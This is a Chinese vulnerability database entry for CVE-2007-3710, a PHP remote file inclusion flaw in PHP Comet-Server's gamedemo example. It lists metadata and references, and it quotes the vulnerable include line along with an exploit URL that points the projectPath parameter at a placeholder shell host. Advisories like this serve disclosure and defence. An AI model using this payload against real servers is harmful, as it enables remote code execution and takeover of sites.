PHP Comet-Server 远程执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1189874 漏洞类型 未知
发布时间 2007-07-11 更新时间 2007-07-11
CVE编号 CVE-2007-3710 CNNVD-ID CNNVD-200707-196
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/85586
https://cxsecurity.com/issue/WLB-2007070031
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-196
|漏洞详情
PHPComet-Server的example/gamedemo/inc.functions.php中存在PHP远程文件包含漏洞。远程攻击者可以借助projectPath参数中的一个URL,执行任意PHP代码。
|漏洞EXP
Discovered by: MasTerX
----------------

_Bug in :
 comet/example/gamedemo/inc.functions.php
_Vlu Code :
  include($projectPath."/inc.var.php");

http://site.com/path/example/gamedemo/inc.functions.php?projectPath=http
://SHELLURL.COM?
|受影响的产品
Php Comet-Server Php Comet-Server 0
|参考资料

来源:BUGTRAQ
名称:20070708PHPComet-Server
链接:http://www.securityfocus.com/archive/1/archive/1/473188/100/0/threaded
来源:SREASON
名称:2876
链接:http://securityreason.com/securityalert/2876